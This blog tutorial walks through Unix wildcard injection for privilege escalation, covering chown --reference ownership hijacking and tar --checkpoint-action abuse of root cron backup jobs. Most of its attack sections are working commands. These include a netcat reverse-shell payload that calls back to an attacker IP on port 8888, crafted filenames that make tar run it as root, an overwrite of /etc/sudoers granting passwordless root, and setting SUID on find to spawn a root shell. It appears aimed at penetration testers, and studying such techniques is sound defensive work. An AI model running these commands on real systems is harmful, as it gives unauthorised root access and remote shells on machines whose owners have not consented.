E Exploits

Exploiting Wildcard for Privilege Escalation

Hello friends!! In this article, we will cover “Wildcard Injection” an interesting old-school UNIX hacking technique, which is still a successful approach for Post exploitation and even many security-related folks haven’t heard of it. Here you will get surprised after perceiving some UNIX tools like ‘tar’ or ‘chown’ can lead to full system compromise.

Table of content

  • Introduction
  • Wildcard
  • Wildcard wildness example 1
  • File hijacking example 2
  • Post Exploitation via tar (Phase I)
  • Tar Wildcard Injection (1st method)
  • Post Exploitation via tar (Phase II)
  • Tar Wildcard Injection (1st method)
  • Tar Wildcard Injection (2nd method)
  • Tar Wildcard Injection (3rd method)

Let’s Start!!!

Wildcard

The wildcard is a character or set of characters that can be used as a replacement for some range/class of characters. Wildcards are interpreted by the shell before any other action is taken.

Some Wildcards character:

*     An asterisk matches any number of character in a filename, including none.

 ?     The question mark matches any single character.

[ ]   Brackets enclose a set of characters, any one of which may match a single character at that position.

 –     A hyphen used within [ ] denotes a range of characters.

~     A tilde at the beginning of a word expands to the name of your home directory. Append another user’s login name to the character, it refers to that user’s home directory.

1st Example

You might be aware of wildcard symbol and their traditional usage but here we are presenting wildcard wildness and for this, I would like to draw your attention towards below steps.

cd /Desktop
mkdir wild
cd wild
echo "Hello Friends" > file1
echo "This is wildcard Injection" >file2
echo "take help" > --help

So as you can observe, here we have made a new directory “wild” on the desktop then with help of echo command we have created 3 files and written 1 line in each file.

image

Afterwards, with help of cat command, we try to open all above 3 files as shown:

cat file1
cat file 2
cat --help

However, the first two files opened normally and show the same information as written above. But the cat command failed to read information written inside –help file. Instead of showing “take help” while opening –help file it calls its own –help options from its own libraries & such type of trick is called Wildcard wildness.

image

File owner hijacking via Chown

Similarly again we try to do something roguish with help of chown command. As we know it is an abbreviation of change owner, which is used on Unix-like systems to modify the ownership of file system files, directories and it may only be changed by a super-user. Let say we have three users in our system.

Super-user (root) – perform admin-level task such as run chown command.

Non-root-user1 (raj) – perform ordinary jobs such as create file

Non-root-user2 (aarti) – perform ordinary jobs such as create file

Mischief-user (Ignite) – perform the notorious task such as Chown file reference trick that can lead file owner hijacking.

In the following image, you can observe all the PHP file is owned by user: raj. Now when the user: ignite found all PHP file is own be user raj then he induce two PHP file himself in the same directory and use file reference trick for file owner hijacking by executing below commands.

cd
ls -al
echo "" > my.php
echo > --reference=my.php

image

As you can notice, mostly file is owned user: raj and the last two files are owned by user: ignite and when the super-user will be supposed to change ownership of all file having PHP extension with help of wildcard, then all files will indirectly come under the ownership of user: ignite.

As you can observe when root user run chown command to give ownership of all PHP file to the user: aarti, an error occurred and as result, the all PHP file get seized by user: ignite automatically.

chown -R aarti:aarti *.php
ls -al

Conceptual Information:

If you have ever explored chown to read its optional switches then you will find the following option.

–reference=RFILE (use RFILE’s owner and group rather than specifying OWNER:GROUP values)

In our case user: ignite executed following commands:

echo "" > my.php
echo > --reference=my.php

Then root user takes help of wildcard character for changing ownership. Thing is that wildcard character used in ‘chown’ command line took subjective ‘–reference=.my.php’ file and passed it to the chown command at the command line as an option.

image

Post Exploitation via tar (Phase I)

Lab-Setup

Likewise again we extend the wildness of wildcard character to the ultimate level and it was like a dynamic explosion in terms of system hacking.

Tar is very common UNIX program for creating and extracting archives. And with help of it, we are going to take compress backup of any directory. For example, make a new directory and give ALL permission to it and then create some files.

mkdir html
chmod 777 html
cd html
touch index.html
touch raj
touch file.txt

image

Now schedule a task with help of crontab to run tar archival program for taking backup of /html from inside /var/backups in every 1 minute.

nano /etc/crontab
*/1 *   * * *   root tar -zcf /var/backups/html.tgz /var/www/html/*

image

Let’s verify the schedule is working or not by executing following command.

cd /var/backup
ls

image

Tar Wildcard Injection (1st method)

Privilege Escalation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.

cat /etc/crontab

Here we notice the target has scheduled a tar archival program for every 1 minute and we know that cron job runs as root. Let’s try to exploit.

image

On a new terminal generate netcat reverse shell malicious code for achieving netcat reverse connection by using msfvenom and enter the following command for that.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R

Copy the generated payload and paste inside victim’s shell as described below.

nc -lvp 8888

image

Now paste above copied payload as describe below and ran the following commands inside victim’s tty shell.

echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

image

The above commands help the tar command to run the file shell.sh, after the first file is archived. Since the tar command is running as root due to crontab, this has the effect of spawning a netcat shell and sending it to the attack platform on port 8888. And if you go back to the terminal window where the listener was on, you will have victim’s reverse connection in after 1 minute.

id

whoami

Conceptual Information:

If you have ever explored chown to read its optional switches then you will find the following option.

–checkpoint[=NUMBER] show progress messages every Numbers record (default 10)

 –checkpoint-action=ACTION execute ACTION on each checkpoint

There is ‘–checkpoint-action’ option, that will specify the program which will be executed when the checkpoint is reached. Mainly, this permits us to run an arbitrary command. Hence Options ‘–checkpoint=1’ and ‘–checkpoint-action=exec=sh shell.sh’ are handed to the ‘tar’ program as command line options.

image

Post Exploitation via tar (Phase II)

Lab Setup

There are multiple ways to take compressed backup and multi techniques can also be applied for privilege escalation. In this phase, with help of tar, we are going to take compress backup of a directory. For example, make a new directory whose backup you wish to take and give ALL permission to it and then create some files.

cd /tmp
mkdir data
cd data
echo "" > f1
echo "" > f2
echo "" > f3
ls

image

Now in other directory write a bash script for taking backup of /tmp/data with help of tar archive program.

mkdir info
cd info
nano script.sh
chmod 777 script.sh

image

#!/bin/bash
cd /tmp/data
tar cf /backup/backup.tgz *

image

Now schedule a task with help of crontab to run tar archival program for taking backup of /html inside /var/backups in every 1 minute.

nano /etc/crontab                                   
*/1 *   * * *   root    /info/script.sh

image

And after 1 minute you will notice backup.tgz file is generated inside info directory.

image

Tar Wildcard Injection

Privilege Escalation

Start your attacking machine and first compromise the target system and then move to privilege escalation stage. Suppose I successfully login into victim’s machine through ssh and access non-root user terminal. Then open crontab to view if any job is scheduled.

cat /etc/crontab

Here we notice the target has scheduled a bash program script for every 1 minute and we know that cron job runs as root. The minute attacker read the program written inside the script.sh, he can apply tar wildcard injection.

image

Again generate netcat reverse shell payload as done above.

image

And again repeat above step as shown in the image.

image

Then get back to netcat shell for victim’s reverse connection and you will notice after 1 minute you get victim’s netcat session.

whoami
cd /root
pwd

Hence, the target can be easily exploited if he makes usage tar archive program either by scheduling job via command or through bash script.

image

Tar Wildcard Injection (2nd method)

Privilege Escalation

Basically, with help wildcard injection an attack want to gain the highest privilege of the system, therefore, he will try to inject some malicious code with help of tar for root access. But there are multiple ways to obtain root access and hence you can apply following techniques for privilege escalation.

Suppose you have victim’s machine as a non-root user and for privilege escalation either take root access or try to give sudo right to non-root user by adding him sudoers file. Thus you can take help of following commands.

echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > --checkpoint=1
tar cf archive.tar *

With the help of above command we had tried to give root permission to the user: ignite and for 1 minute. After 1 minute passed we successfully owned root account.

sudo -l
sudo bash
whoami

image

Tar Wildcard Injection (3rd method)

Privilege Escalation

There are multiple ways for privilege escalation with help of tar injection but we are discussing very few methods among them. Suppose you have victim’s machine as the non-root user and for privilege escalation, you can try to enable SUID bit for any system binaries and likewise above again you can take help of the following command for obtaining root access.

echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
ls -al /usr/bin/find
find f1 -exec "whoami" \;
root
find f1 -exec "/bin/sh" \;
id
whoami

WOOhOOO!! Hope you people will enjoy this trick while penetration testing.

image

Source: https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

The post Exploiting Wildcard for Privilege Escalation appeared first on Hacking Articles.

Read more